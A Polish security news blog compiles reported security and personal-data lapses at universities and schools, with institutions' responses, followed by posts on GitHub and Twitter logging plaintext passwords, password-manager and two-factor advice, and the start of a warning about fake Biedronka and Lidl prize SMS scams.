Cała ta wiedza dostępna bez logowania! Wystarczyło znać adres strony do zgłaszania, a skoro my go poznaliśmy to inni też mogli.

Po raz kolejny mieliśmy przyjemność z panią rzecznik PW Izabelą Koptoń-Ryniec.

Bardzo dziękujemy za zasygnalizowanie problemu. System zgłaszania usterek, o który Państwo pytają, miał w założeniu służyć zgłaszaniu usterek błahych, nie stanowiących poprzez sam fakt upublicznienia zgłoszenia, zagrożenia dla wydziału lub uczelni. Pragniemy podkreślić, że dostęp do pomieszczeń umożliwia nie tylko karta, ale i zwykły klucz. Dodatkowo sale są zabezpieczone monitoringiem i całodobową ochroną gmachu. Kwestia zmiany systemu, tak aby administrator po zgłoszeniu ukrywał informacje krytyczne, była już przez nas badana w związku z czym podejmować będziemy dalsze działania w kierunku racjonalizacji funkcjonowania systemu. Niemniej w okresie przejściowym postanowiliśmy zabezpieczyć cały system hasłem, co już nastąpiło.

Racjonalizacja systemów bezpieczeństwa. Piękne pojęcie. Oby każdy! Oby częściej!

Politechnika Wrocławska i “dziwna właściwość poczty”

To był bardzo ciekawy problem. Studenci PWr korzystają z poczty studenckiej, którą cechują adresy w formacie nr_indeksu@student.pwr.edu.pl. Nasza Czytelniczka przy okazji wykonywania pewnego zadania zorientowała się, że po skonfigurowaniu poczty w programie zewnętrznym mogła wysłać e-maile z dowolnych adresów bez żadnych danych uwierzytelniających! Co więcej…

z ciekawości podmieniłam mail źródłowy na dziekanat@pwr.edu.pl i również po wykonaniu programu otrzymałam na swoją skrzynkę maila z dziekanatu!!! Pokazałam tę właściwość kilku znajomym i prowadzącemu, wzajemnie z różnych adresów źródłowych  wysyłaliśmy sobie maile o różnej treści. Oczywiście tylko w gronie studenckim i w ramach testów, ale zaszokowało nas to, że w ten sposób możemy wysłać komuś, czy to prowadzącemu, czy studentowi maila z dziekanatu, od rektora, od innego prowadzącego czy studenta – od każdego z pwr do każdego z pwr o dowolnej treści.

Na szczęście nie można było wysłać maila z tego serwera na inne np. Gmail, bo to wymagało uwierzytelniania. Mimo to “dziwna właściwość poczty” stwarzała wiele zagrożeń.

Studenci ostrzegali się wzajemnie w tej sprawie. My zaś podpytaliśmy władze uczelni, które przesłały nam oświadczenie “iinformatyków”.

Odnośnie braku autoryzacji zapewniamy, że zostanie ona włączona dla poczty wewnętrznej. Dla poczty wysyłanej na zewnątrz zawsze była wymagana. Dodatkowo trwają prace nad wprowadzeniem zmian w konfiguracji systemu pocztowego. Mają one na celu ograniczenie możliwości wysyłania poczty w domenie uczelni z dowolnego MTA. Proces wprowadzania zmian konfiguracji jest długotrwały. Szacujemy zakończenie wspomnianych prac podczas najbliższej przerwy międzysemestralnej.

Jednocześnie informujemy, iż nie są nam znane przypadki wykorzystania słabości protokołu SMTP na Politechnice Wrocławskiej. Pracownicy mają możliwość stosowania w klientach pocztowych certyfikatów osobistych X509, umożliwiających podpisywanie i szyfrowanie korespondencji.”

Do czasu naprawienia poczty radzimy… w ogóle nie ufać w autentyczność nadawców w wewnętrznej poczcie PWr.

Politechnika Wrocławska – usterka aplikacji

Nasz Czytelnik zauważył ciekawą lukę w aplikacji ASAP Politechniki Wrocławskiej. Aplikacja umożliwiała m.in. pobranie zaświadczenia o samodzielnym napisaniu pracy dyplomowej.

Problem w tym, że link do oświadczenia miał dość przewidywalny format.

Można było zmienić m.in. ID autora, aby pobrać zaświadczenie innej osoby.

Można było również zmienić document_id aby pobrać zaświadczenie dla pracy z innym tytułem, ale to wydaje się mniejszym problemem.

Uczelnia zareagowała szybko, ale niestety ASAP jest produktem dostarczonym przez zewnętrznego dostawcę.

Obecnie pracujemy nad wdrożeniem zabezpieczenia tymczasowego.  Jednocześnie monitorujemy serwis pod kątem nieuprawnionego dostępu użytkowników do danych innych kont – napisał Andrzej Charytoniuk z Działu Informacji i Promocji PWr.

Dzień później dostaliśmy informację, że problem został rozwiązany, tzn. możliwość pobierania „obcych” dokumentów została zablokowana.

Uniwersytet Mikołaja Kopernika w Toruniu

Na stronie UMK znalazły się niezabezpieczone katalogi z plikami.

Były tam m.in. zadania egzaminacyjne z odpowiedziami, materiały edukacyjne i puste formularze (np. deklaracje dotyczące prac dyplomowych). Jeden z naszych Czytelników widział tam plik o nazwie passwords.txt. My się do niego nie dokopaliśmy, ale za to znaleźliśmy potwierdzenia przelewów z danymi osobowymi oraz dokumenty wypełniony wniosek o stypendium z oświadczeniem o dochodach. Dane nie wyglądały na przypadkowe.

Uczelnia stwierdziła, że “adres należy do studenta” i “dyrektor Instytutu zwrócił się już do niego z prośbą o jak najszybsze zablokowanie swoich danych”. Nie wiemy na jakiej zasadzie uczelnia udostępnia swoim studentom powierzchnię na serwerze, ale jeśli trzymacie jakieś dane na jej serwerach to upewnijcie się, czy są one bezpieczne.

Uniwersytet Ekonomiczny w Katowicach

Na początku marca wyciekły dane części studentów Uniwersytetu Ekonomicznego w Katowicach. Doszło do wysłania do studentów wiadomości, która zawierała załącznik z peselami, numerami dowodów i adresami zamieszkania razem z aneksem do umowy. Uczelnia postanowiła ostrzec studentów, że mogą naruszyć prawo rozpowszechniając dalej ujawnione w ten sposób dane.

Wiele osób odebrało tę wiadomość jako rodzaj groźby. My natomiast chcieliśmy wiedzieć więcej o wycieku, więc 9 marca 2018 r. spytaliśmy o sprawę Marka Kiczkę, rzecznika Uniwersytetu.

Odpowiedź otrzymaliśmy następnego dnia roboczego.

Miejsce wycieku danych dotyczyło wyłącznie Wydziału Zarządzania i obejmowało dane około stu studentów.

Początkowo znamiona wycieku wskazywały na błędy systemu, jednak w drodze weryfikacji określono, iż był to błąd ludzki oraz zła interpretacja działania programu do obsługi studentów.

Wyciek został zauważony wieczorem w piątek 23 lutego br. Niezwłocznie w sobotę rano usunięte zostały e-maile z danymi z systemu wirtualny dziekanat. W trosce o zabezpieczenie danych oraz z uwagi na bezpieczeństwo samych studentów, w poniedziałek wysłano do studentów e-mail informujący o wycieku i konieczności permanentnego usunięcia danych oraz ich ewentualnych kopii (Uniwersytet nie ma możliwości ingerowania w prywatne skrzynki studentów).

Jednocześnie zabezpieczone zostały informacje o tym, które dane trafiły do studentów. Zweryfikowano również, czy do wycieku nie doszło na pozostałych wydziałach, pouczono pracowników oraz podjęto decyzję o przeprowadzeniu szkoleń z zakresu ochrony danych osobowych. Specjalne szkolenie odbyło się 9 marca br. Wobec osób odpowiedzialnych za wyciek wyciągnięto konsekwencje. Uniwersytet wyraża żal z powodu zaistniałej sytuacji i dołoży wszelkich starań, by zdarzenia takie nie miały więcej miejsca.

Reakcja dobra. Zwłaszcza to uderzenie się w pierś i wyznanie, że to jednak nie był “mityczny błąd systemu” — a jak to zwykle bywa, błąd człowieka, tłumaczony mniej spersonifikowanym i enigmatycznym oraz buntującym się”systemem”. Ciekawe natomiast jest to, że Uniwersytet nie mógł skasować e-maili ze skrzynek studentów. Zastanawia nas, czy było to wyzwanie moralne czy techniczne…

Znów kryptowaluty!

Widzieliśmy już kopanie kryptowalut przez stronę uczelni, ale żeby ktoś to robił na komputerach w sali ćwiczeniowej? Jeden z Czytelników doniósł nam, że właśnie coś takiego dzieje się na Uniwersytecie Warmińsko-Mazurskim w Olsztynie. Nasz Czytelnik znalazł na niektórych maszynach koparkę XMRIG.EXE.

Czytelnik sugerował, ze koparkę musiał zainstalować ktoś z uprawnieniami administratora, jednak ta osoba nie musiała działać świadomie. XMRIG.EXE może być zainstalowany niechcący np. jako dodatek do innego darmowego oprogramowania.

Zgłosiliśmy sprawę uczelni. Pani Wioletta Ustyjańczuk poinformowała nas, że wcześniej nikt tego nie zgłaszał władzom uczelni. Podjęto działania, które mają na celu usunięcie koparek i ewentualnie ustalenie kto za to odpowiadał.

Uniwersytet Ślaski i CyberChaos

Poniżej prezentujemy wam zrzut strony Instytutu Historii tej uczelni. Czy znajdziecie niepasujący element?

 

Osoby spostrzegawcze widzą wiadomość od grupy/osoby CyberChaos. Daliśmy znać uczelni, bo zmiana była wprowadzona 12 kwietnia, a jeszcze 16 kwietnia wiadomość była na stronie. CyberChaos wcześniej interesował się Politechniką Śląską…

Akademia Morska w Gdyni i Rejs Niepodległości

Ministerstwo Gospodarski Morskiej i Żeglugi Śródlądowej zorganizowało konkurs pn. Rejs Niepodległości. Zaliczyliśmy go do wpadek uczelnianych, ponieważ od strony technicznej konkursem zajmowali się pracownicy Akademii Morskiej w Gdynii.

Nagrodą w konkursie był udział w jednym z etapów rejsu żaglowca „Dar Młodzieży” dookoła świata. Dla laureatów opracowano formularz, w którym podawali oni swoje dane tj. numery dowodów osobistych, paszportów, adresy zamieszkania i kontakty do osób bliskich. Osoby te miały również podać preferowany odcinek rejsu, w którym miały wziąć udział.

Aby uzyskać dostęp do formularza z wymienionymi danymi danymi, wystarczyło podać imię, nazwisko oraz datę urodzenia. Lista laureatów pojawiła się na stronie konkursu, więc… imiona i nazwiska były na tacy. Daty urodzenia można było ustalić np. szperając po Facebooku.

Niektóre osoby miały problem z formularzem więc organizator prosił o przesyłanie danych e-mailem.

Nasz Czytelnik i uczestnik konkursu doniósł nam, iż…

…znalazła się osoba która wykorzystała brak profesjonalizmu organizatorów i pozmieniała wybory etapów części laureatów działając na własną korzyść. Co skutkowało unieważnieniem przydziału odcinków, a osoby które już zdążyły uzyskać urlop, zaplanować czas (mówimy o rejsach trwających nawet ponad 2 miesiące!) zostały na lodzie.

Organizator miał świadomość tego, co się stało. Nadano hasła do formularzy i te hasła przesłano zwykłym mailem.

Organizator uznał też, że mimo wszystko nie może się czuć odpowiedzialny za dane laureatów, jakie dało się znaleźć w social mediach (w czym jest nieco racji, choć nie usprawiedliwia to słabych zabezpieczeń formularza).

O sprawę pytaliśmy Ministerstwo Gospodarki Morskiej. Przyznało ono, że formularz nie był zabezpieczony jak należy. Informację cytowaną poniżej otrzymaliśmy z biura prasowego ministerstwa (nikt nie podpisał się pod nią z nazwiska).

Natychmiast po zgłoszeniu uwagi na ten temat Ministerstwo zleciło Akademii Morskiej w Gdyni stworzenie lepszego zabezpieczania formularzy uczestników Rejsu. Po otrzymaniu sygnałów o możliwych nieprawidłowościach natychmiast poleciliśmy Akademii Morskiej stworzenie nowego formularza, do którego dostęp każdy z uczestników otrzymał poprzez unikatowe, jednorazowe hasło. Poprosiliśmy także Akademię Morską o wyjaśnienia. Wynikało z nich, że na szczęście nie doszło do włamania na serwery AM i nie stwierdzono wycieku danych. Administratorzy AM sprawdzili logi na urządzeniach sieciowych i  nie znaleźli żadnych niepokojących zapisów.

Owszem, włamania nie było bo…

mem

Uniwersytet Ekonomiczny we Wrocławiu

Tak wygląda proces podbijania legitymacji studenckich na wrocławskim UE. Zdjęcie mówi wszystko :)

Punkty ksero

Pewien Czytelnik napisał do nas list z przemyśleniami na temat punktów ksero.

Do punktu wchodzimy po schodkach, do pokoju podzielonego ladą, na której stoi pięć komputerów, monitory ustawione są przodem do klienta i tyłem do sprzedawcy, przez to miejsce przewija się kilkadziesiąt jak nie kilkaset osób dziennie i każda z nich aby coś wydrukowac przychodzi z pendrivem lub loguje się na email, czy nie uważacie że przez takie rozwiązanie zainstalowanie keylogera z pendrivea (nikt nie zwróci uwagi na to że ktoś wkłada pendrive do komputera), i zbieranie kilkudziesięciu/kilkuset passów do kont studentów jest nadzwyczaj proste? Czy istnieją może rozwiązania które skutecznie uniemożliwiają instalacje takiego oprogramowania lub może punkty są zobowiązane bronić się przed tego typu atakami odgórnie? Sam nie zbadalem dogłębnie sprawy ale z tego co wiem komputery działają na systemach XP, i po krótkim przeszukaniu dysku nie znalazłem nawet antywirusa.

Zasadność przedstawionych w liście obaw potwierdziła się w innym liście od innego Czytelnika, studenta Wyższej Szkoły Informatyki i Zarządzania w Rzeszowie.

Całkiem niedawno korzystałem z uczelnianego punktu ksero drukując pewne dokumenty. Polegało to na tym, że do laptopa na ksero podłączałem swojego pendrive’a, wskazywałem osobie z obsługi który to plik, następnie dokonywała ona wydruku.(…) Parę dni temu kolega który również korzystał z punktu ksero powiedział mi, że wszystkie jego pliki na pendrivie po podłączeniu go do laptopa w punkcie ksero zmieniły swoje rozszerzenie na “*.lnk” i stał się niemożliwe do otworzenia. Zaciekawiony daną sytuacją podłączyłem swojego pendrive’a do  komputera po czym okazało się, że i moje pliki i katalogi zmieniły rozszerzenie na “*.lnk”.

Późniejsze przeskanowanie pendrive’a Avastem pokazało jedno zagrożenie.

Na wszelki wypadek daliśmy uczelni znać o możliwym problemie. \

Rzecznik prasowy WSIiZ Dominik Łazarz zapewnił nas, że skontaktował się w imieniu uczelni z Prezesem stowarzyszenia ABSOLWENT, które prowadzi punkt ksero. Przy okazji ustalił, że…

  • Na komputerze jest zainstalowane oprogramowanie antywirusowe. Stowarzyszenie ma świadomość, że interesanci przynoszą na różnych nośnikach materiały do wydruku i czasami są one zawirusowane.
  • Pracownicy Stowarzyszenia  sprawdzili podejrzany komputer i zapewnili, że wszystko wydaje się być dobrze.
  • Co jakiś czas robione jest dodatkowe skanowania, a ostatnio cały system był na komputerze “stawiany” pod koniec 2017 r.

Nie mamy pewności, czy problemy były efektem podłapania wirusa w punkcie ksero, ale problem jest godny wspomnienia i jeśli będziecie obserwować jakieś dziwne rzeczy po wizycie w takich punktach, dawajcie nam znać.

Egzaminy adwokackie/radcowskie ciągle bez antywirusów

To może nie jest problem ściśle uczelniany, ale jednak związany z kształceniem prawników. I niestety ciągle aktualny mimo naszych narzekań. Już w roku 2016 pisaliśmy, że wzięcie udziału w egzaminie adwokackim lub radcowskim wymaga przyniesienia komputera z odinstalowanym antywirusem. To nie jest dobry pomysł, aby w określonym momencie czasowym wymagać od wielu prawników odinstalowywania antywirusów. Ministerstwo tłumaczy, że nigdy nie zaobserwowano żadnych problemów więc nie ma się czym przejmować.

Mamy rok 2018 i czytając ogłoszenie na stronie Okręgowej Izby Adwokackiej przekonacie się, że nic się nie zmieniło. W tym ogłoszeniu przeczytamy nie tylko, że program antywirusowy ma być odinstalowany. Przeczytamy także, że uczestnicy egzaminu mają złożyć pisemne oświadczenie z deklaracją o świadomości ryzyka!

Uprzejmie informuję, że do dnia 27 lutego 2018 r. włącznie, zdający egzamin przed Komisjami Egzaminacyjnymi (…) składa pisemną informację o wyborze sposobu rozwiązywania zadań egzaminacyjnych w formie odręcznej albo przy użyciu własnego sprzętu komputerowego. W przypadku wyboru rozwiązania zadań przy użyciu własnego sprzętu komputerowego zdający składa także pisemne oświadczenie o akceptacji warunków związanych z użyciem własnego sprzętu komputerowego, zawierające deklarację, że znane są mu zagrożenia związane z użyciem tego sprzętu.

Część adwokatów jest świadoma ryzyka bo pisze do nas na ten temat. Czy wszyscy mają tę świadomość? Nie wiemy. Ministerstwo Sprawiedliwości z pewnością ciągle nie jest świadome ryzyka!

Tymczasem w pewnym Technikum

Zejdźmy z poziomu adwokackiego na poziom szkół średnich. Czytelnik podesłał nam taką oto fotkę z zespołu szkół w Aleksandrowie Kujawskim. Popatrzcie jak ktoś się napracował, aby zamazać PESEL-e czarnym markerem. Totalnie nie da się ich odczytać. Totalnie (białe kwadraty zostały dodane przez czytelnika, który nam to podesłał):

PESELE na szkolnym turnieju (bez HTTPS)

W poprzednim odcinku uczelnianych wpadek narzekaliśmy trochę na krakowski Zespół Szkół Energetycznych, który używał numerów PESEL jako loginów do platformy głosowania na najlepszych nauczycieli. Niestety nie była to jedyna szkolna inicjatywa ze zbiórką PESEL-i w tle. Ta sama dzkoła zorganizowała także e-sportowy turniej ZSE CUP, na który można się zarejestrować przez taką stronę.

Nie dość, że zbierane są numery PESEL to jeszcze ich przesyłanie odbywa się przez niezabezpieczone połączenie. Najbezpieczniej byłoby  nie brać udziału w tym turnieju.

Studniówki po raz drugi!

Już w poprzednim odcinku Uczelnianych wpadek pisaliśmy o szkołach średnich, które zbierają PESEL-e osób idących na studniówkę. Wspominamy o tym raz jeszcze, bo Technikum nr 5 w Częstochowie opracowało naprawdę drakoński regulamin studniówki.

Usiądźcie wygodnie.

Regulamin przewidywał zbieranie PESEL-i i adresów osób towarzyszących w liście dla uczniów…

…a także stworzenie “listy dla wpuszczających”, która dodatkowo zawierała numery dokumentów (np. dowodów osobistych).

Dowiedzieliśmy się, ze wszystkie te dane zbierane były od uczniów na zwykłej kartce papieru, do której mógł mieć wgląd “każdy, kto chciał coś uzupełnić”. Podanie numeru dokumentu było konieczne aby dostać się na sale (numer był sprawdzany).

Najchętniej doradzilibyśmy uczniom tego Technikum, aby nie brali udziału w studniówce. Uwierzcie nam. To jest przereklamowane wydarzenie i z biegiem czasu człowiek nabiera do niego dystansu. Niestety Technikum nr 5 w Częstochowie przygotowało opłaty dla osób, które na studniówkę nie pójdą (sic!).

Regulamin przewiduje, że…

Uczniowie mający bardzo trudną sytuację materialną mogą zwrócić się do Komitetu Organizacyjnego podaniem o zwolnienie z części opłat. Podanie musi zaopiniować wychowawca. Decyzję o zwolnieniu podejmuje Komitet Organizacyjny.

Podstawy prawnej nie podano, ale organizator studniówki (zespół rodziców zwany Komitetem Organizacyjnym) wydaje się być bardzo pewnym swojego prawa do pobierania opłat nawet za niepójście na studniówkę. Tylko co by się stało, gdyby ktoś naprawdę nie zapłacił? Komitet uruchomi komornika?

No dobrze… wiemy, że w niektórych szkołach w cenie studniówki jest także prezent dla nauczyciela. Ale mimo wszystko ten regulamin robi zabawne wrażenie.

To nadal nie koniec!

Dziękujemy tym, którzy wytrwali. Dzisiejsza, 4 z kolei kompilacja Uczelnianych Wpadek była dość długa. Ale to nie koniec…

Regularnie zgłaszacie nam problemy z ochroną danych w Waszych szkołach i uczelniach. Być może więc zgłosiliście nam jakąś uczelnianą wpadkę, a nie widzicie jej tutaj. Oznacza to, że możemy być jeszcze w trakcie wyjaśniania sprawy, czekamy na załatanie problemu, albo z innych powodów musieliśmy odłożyć publikację. Nie martwcie się jednak. To z pewnością nie jest ostatni odcinek tego cyklu — wszystkie zgłoszenia ujrzą światło dzienne.

I oczywiście czekamy na więcej. Jakby co, to wiecie gdzie podsyłać nam materiał na kolejne odcinki ;)

Przeczytaj także:

<!-- Similar Posts took 19.715 ms -->

May 07 2018

07:14

* 3 sposoby na to, aby programiści szybciej wdrażali poprawki bezpieczeństwa

…to opisywanie ich w taki sposób:

Eksperymet przetestował @the_T_bot i twierdzi, że działa.

PS. Jeśli złapałeś się na ten tytuł i kliknąłeś, to chyba masz problem z szybkim wdrażaniem poprawek — a zatem to może ci się przydać.

Przeczytaj także:

<!-- Similar Posts took 6.110 ms -->

May 06 2018

18:40

Z Twittera i GitHuba wyciekły Wasze hasła. Ale nie ma powodu do paniki

Na przestrzeni ostatnich kilku dni dwa duże serwisy Twitter i GitHub zaliczyły wpadki związane z niepoprawnym przechowywaniem haseł swoich użytkowników. A dokładniej — oba serwisy przyznały, że przechowywały hasła użytkowników jawnym tekstem, czyli bez szyfrowania. Na szczęście tylko w logach do których ponoć mało kto z pracowników zaglądał…

GitHub logował zmieniane hasła

Najpierw o wycieku haseł poinformował GitHub. 1 maja rozesłał taką wiadomość e-mail do użytkowników:

Temat: [GitHub Security] Please reset your password

Hi there,
During the course of regular auditing, GitHub discovered that a recently introduced bug exposed a small number of users’ passwords to our internal logging system, including yours. We have corrected this, but you’ll need to reset your password to regain access to your account.
GitHub stores user passwords with secure cryptographic hashes (bcrypt). However, this recently introduced bug resulted in our secure internal logs recording plaintext user passwords when users initiated a password reset. Rest assured, these passwords were not accessible to the public or other GitHub users at any time. Additionally, they were not accessible to the majority of GitHub staff and we have determined that it is very unlikely that any GitHub staff accessed these logs. GitHub does not intentionally store passwords in plaintext format. Instead, we use modern cryptographic methods to ensure passwords are stored securely in production. To note, GitHub has not been hacked or compromised in any way.
You can regain access to your account by resetting your password using the link below::
https://github.com/password_reset
If you have any lingering questions or concerns about this, don’t hesitate to let us know. You can reach us by emailing support@github.com or by using our contact form:
https://github.com/contact
Thanks,
GitHub Support

W przypadku GitHuba, wyciek dotknął niektórych użytkowników (tych, którzy dokonywali resetu hasła) i polegał na logowaniu hasła jawnym tekstem w pliku, który nie był publicznie dostępny i który nie został wykradziony. Ale ponieważ niektórzy pracownicy GitHuba mieli do niego dostęp, serwis na wszelki wypadek wymusił zmianę haseł wśród osób dotkniętych “wyciekiem”. I to należy docenić. Bardzo odpowiedzialna postawa!

Co ciekawe, zawinił błąd w mechanizmie antyspamowym, który zliczał wywołania funkcji resetu hasła. Błąd został wykryty wewnętrznie a wykrycie — w przeciwieństwie do tego co sugerowali niektórzy internauci — nie miało nic wspólnego z żadnymi procesami pre-GDPR-owymi.

Monitorowanie zdarzeń resetu hasła ma wiele zalet. W ten sposób można ujawnić m.in. wycieki baz danych lub nieuprawniony dostęp. Tę sztuczkę zdradzam od lat uczestnikom szkolenia Atakowanie i Ochrona Webaplikacji. Ciekawych tricków na podniesienie bezpieczeństwa webaplikacji jest oczywiście o wiele więcej. Zainteresowanych zapraszam na najbliższe terminy tego szkolenia, które odbędą się 14-15 maja w Warszawie, 17-18 maja w Krakowie, 24-25 maja w Gdańsku i 18-19 czerwca we Wrocławiu. Po wybraniu dogodnego terminu miejsce można poprzez formularz na tej stronie, a z opiniami uczestników ostatnich terminów można zapoznać się tutaj.

Twitter miał podobny błąd

Dwa dni po wpadce GitHuba, do podobnej wpadki przyznał się Twitter… Użytkownicy po zalogowaniu się na swoje konta zobaczyli taki komunikat (dostali go też e-mailem):

Hi @niebezpiecznik,
When you set a password for your Twitter account, we use technology that masks it so no one at the company can see it. We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone.
Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password. You can change your Twitter password anytime by going to the password settings page.
About The Bug
We mask passwords through a process called hashing using a function known as bcrypt, which replaces the actual password with a random set of numbers and letters that are stored in Twitter’s system. This allows our systems to validate your account credentials without revealing your password. This is an industry standard.
Due to a bug, passwords were written to an internal log before completing the hashing process. We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again.
Tips on Account Security
Again, although we have no reason to believe password information ever left Twitter’s systems or was misused by anyone, there are a few steps you can take to help us keep your account safe:
1. Change your password on Twitter and on any other service where you may have used the same password.
2. Use a strong password that you don’t reuse on other services.
3. Enable login verification, also known as two factor authentication. This is the single best action you can take to increase your account security.
4. Use a password manager to make sure you’re using strong, unique passwords everywhere.
We are very sorry this happened. We recognize and appreciate the trust you place in us, and are committed to earning that trust every day.
Team Twitter

W przypadku Twittera szczegóły odkrycia błędu nie są znane. Ale każdy kto pracował przy tworzeniu aplikacji webowej wie, jak łatwo o wpadkę tego typu. Wystarczy podczas logowania “załączyć” niepotrzebnie tryb DEBUG i już w logi lecą rzeczy, które nie powinny i — co równie często spotykane — o takiej pomyłce zespół zazwyczaj dowiaduje się przez przypadek i pod długim czasie.

Sam znam historię, jak to jeden z polskich banków przesyłał miesiącami do swojego partnera pełne dane (logi z transakcji kartowych) zupełnie niepotrzebnie. Ot, pomyłka.

Nie ma powodu do paniki, ale…

Wpadka Twittera i Githuba to przeoczenie o minimalnym ryzyku dla użytkowników tych serwisów, ale i dobra okazja, aby przypomnieć, że:

  • Hasła w większości przypadków są hashowane dopiero po stronie serwera (backendu), a wiec — jak to pięknie pokazał przypadek GitHuba — serwis może “złapać” niezahashowane jeszcze hasło i je zapisać, chociaż później będzie je w bazie przechowywał w poprawny, trudny do złamania sposób (tu: bcrypt). Dlatego nie warto ufać twórcom serwisów, że wszystko robią dobrze i należy stosować się do rady z punktu poniżej.
  • Komunikaty takie ja ten od Twittera czy GitHuba już od dawna nie powinny na nikim robić wrażenia. Hasła wyciekały, wyciekają i będą wyciekać i przynajmniej czytelnicy Niebezpiecznika powinni je już od dawna mieć wszędzie ustawione jako unikatowe ciągi. Takie podejście, w przypadku wycieku, uniemożliwi przejęcie innych kont ofiary niż to, którego hasło ujawniono. Ustawienie różnych haseł do różnych serwisów to najważniejsza “cyberporada”. Serio.

Co ciekawe, chociaż serwisy zachowały się odpowiedzialnie, informując czytelników o swoich przeoczeniach i nie zamiatając sprawy pod dywan, to większość odbiorców e-maili z ostrzeżeniami wyraża opinię raczej pogardliwą (w stylu: “co za łosie, trzymali hasła plaintekstem, jak tak można!!11one!!1!“. Chyba tylko ludzie z branży dostrzegają “gest” i profesjonalizm takich akcji informacyjnych. Trochę szkoda, że użytkownicy jeszcze nie widzą różnic w prośbach o zmianę hasła wynikłych z wewnętrznych audytów (plus) a wycieków/kradzieży danych (minus).

“Dajcie spokój, ustawianie unikatowych haseł to za duży wysiłek!”

Prawie zawsze to słyszę, kiedy podczas prowadzenia naszych cyberwykładów w różnych polskich firmach rekomenduję pracownikom ustawianie unikatowych haseł nie tylko do firmowych ale i do prywatnych usług.

Bo oczywiście — w przypadku wielu kont pojawia się problem: Jak spamiętać wszystkie te unikatowe hasła? Nie zalecam układania haseł wedle algorytmu, np. MojeTajeHasloDoGitHuba2018!, bo ktoś domyśli się jakie ustawiłeś dla Twittera. Po prostu skorzystaj z managera haseł, np. KeePassa i generuj w nim losowe ciągi znaków dla każdego z serwisów w którym rejestrujecie konto.

KeePass (i KeePass XC na macOS) jest wygodny, bo sam potrafi uzupełniać hasła podczas logowania (trzeba doinstalować rozszerzenie do przeglądarki lub skorzystać z modułu tzw. AutoType). Korzystanie z KeePassa wymaga zapamiętania tylko jednego hasła — tego do KeePassa. KeePassa uważam za lepszego od reszty managerów haseł, bo ma otwarty kod źródłowy, nie korzysta z “chmury” i posiada wersję na każdy system operacyjny, także na iPhona.

No ale — jak czujny czytelnik zapewne już dawno zauważył — stosowanie unikatowych haseł rozwiązuje problem z nieautoryzowanym dostępem do innych kont ofiary, ale nie rozwiązuje problemu nieautoryzowanego dostępu do tego konta ofiary z którego to hasło wyciekło. Ten problem akurat nie dotyczy ani GitHuba, ani Twittera. Oba serwisy wspierają dwuskładnikowe uwierzytelnienie, czyli wymóg podania podczas logowania nie tylko hasła (coś co znam i coś co może wyciec i ktoś inny też będzie to znał), ale również czegoś dodatkowego, co tylko właściciel konta posiada (idealnie fizycznie przy sobie).

    W przypadku GitHuba warto pod konto podpiąć
token U2F, np. YubiKey (o tym dlaczego tylko tokeny U2F chronią przed phishingiem przeczytacie tutaj).

Twitter niestety nie wspiera kluczy U2F (buuu!), ale z kontem można skojarzyć aplikację generującą jednorazowe kody dostępu (tzw. OTP), korzystając ze specjalnej aplikacji np. Google Authenticator lub Authy (ta druga jest lepsza, bo potrafi wykonać kopię bezpieczeństwa “seedów”, co doceni każdy, komu kiedyś ukradną telefon albo go zepsuje). I chociaż to prawda, że te kody da się wykraść ofierze poprzez phishing, to lepsze to niż nic. Zresztą w kontekście tego artykułu mówimy o zabezpieczeniu się przed wyciekiem haseł, a nie ochroną przed phishingiem (to bardziej skomplikowany temat).

Czy można zapisywać hasła w przeglądarce?

Na koniec poruszę jeszcze jedną kwestię. Jednym z najczęściej zadawanych po moim wykładzie “Jak nie dać się zhackować?” pytaniem jest to:

Czy zapamiętywanie haseł w przeglądarce jest bezpieczne?

Odpowiedź nie należy do najłatwiejszych…

Zapisywanie haseł w przeglądarce jest dobre, bo pomaga wykryć atak phishing (jeśli hasło samo się nie “autouzupełni” to powinno to dać do myślenia ofierze). Jeśli zapamiętywane w przeglądarce hasło jest unikatowe, to pomoże to też w sytuacji której dotyczy artykuł — jego wyciek/kradzież nie narazi innych kont ofiary na przejęcie. Ale oczywiście — zapamiętywanie haseł może się też okazać złym pomysłem, jeśli ktoś uzyska dostęp do komputera (np. fizycznie lub poprzez infekcję złośliwym oprogramowaniem). Wtedy w znakomitej większości przypadków będzie on w stanie podejrzeć hasła zapisane w przeglądarce (w KeePassie i innym managerze haseł też). No ale jak ktoś uzyska dostęp do twojego komputera, to jak to mawiają,

to nie jest już twój komputer

Nie jest celem managera haseł (osobnego czy wbudowanego w przeglądarkę) ochrona przed tym zagrożeniem. Te rozwiązania powstały by chronić przed częstszym problemem — wyciekiem haseł z serwisów internetowych i użyciem jednego znanego hasła danej osoby do dostępu do jej innych kont, gdzie hasło jest takie samo.

Podsumowując, dla większości osób trzymanie haseł w przeglądarce to dobra decyzja. Byle tylko były one różne do różnych serwisów. To właśnie unikatowość haseł jest najważniejsza.

Takie proste, sensowne i ważniejsze sprawdzone w boju rady jak te powyzej stanowią podstawę mojego wykładu “Jak nie dać się zhcakować?“. Poruszam w nim nie tylko kwestię bezpieczeństwa haseł czy ochrony przed phishingiem lub złośliwym oprogramowaniem. Pokazuję jak bezpiecznie komunikować się z bliskimi, chronić przed internetowym złem swoje dzieci (lub rodziców i dziadków ;) i jak robić zakupy w internecie tak, aby nie stracić pieniędzy, nawet jeśli kontrahent okaże się oszustem. Poza prostymi do zrozumienia poradami dzielę się też listą przydatnych serwisów internetowych i darmowymi programami które ułatwiają zabezpieczenie komputera, smartfona i cyfrowej tożsamości. Wpadnij posłuchać :) Wykład w maju odbędzie się w Warszawie, Krakowie, Łodzi i Gdańsku (a po wakacjach także we Wrocławiu). Z pełną agendą zapoznasz się i miejsce zarezerwujesz na tej stronie.

Przeczytaj także:

<!-- Similar Posts took 6.813 ms -->

15:32

Uwaga na SMS-y od Biedronki i Lidla informujące o wygranej

Wczoraj o 14:00 i dziś o 11:00 na telefony Polaków rozesłane zostały 2 kampanie SMS-owe w których oszust podszywając się pod Lidla i Biedronkę informował o “paczce gotowej do odbioru”. SMS-y zawierają linka do strony internetowej, która okłamuje odbiorcę, że wygrał on bon na 300 PLN …a potem wyłudza dane osobowe oraz prosi o numer karty w celu “potwierdzenia” wygranej. Jeśli ktoś wypełnił formularz podstawiony przez oszusta, jego karta zostanie za 7 dni obciążona kwotą 49,99 dolarów (ok. 178 PLN).

SMS od Biedronki

Oto jak wyglądały SMS-y dla kampanii w której oszust podszywał się pod Biedronkę:

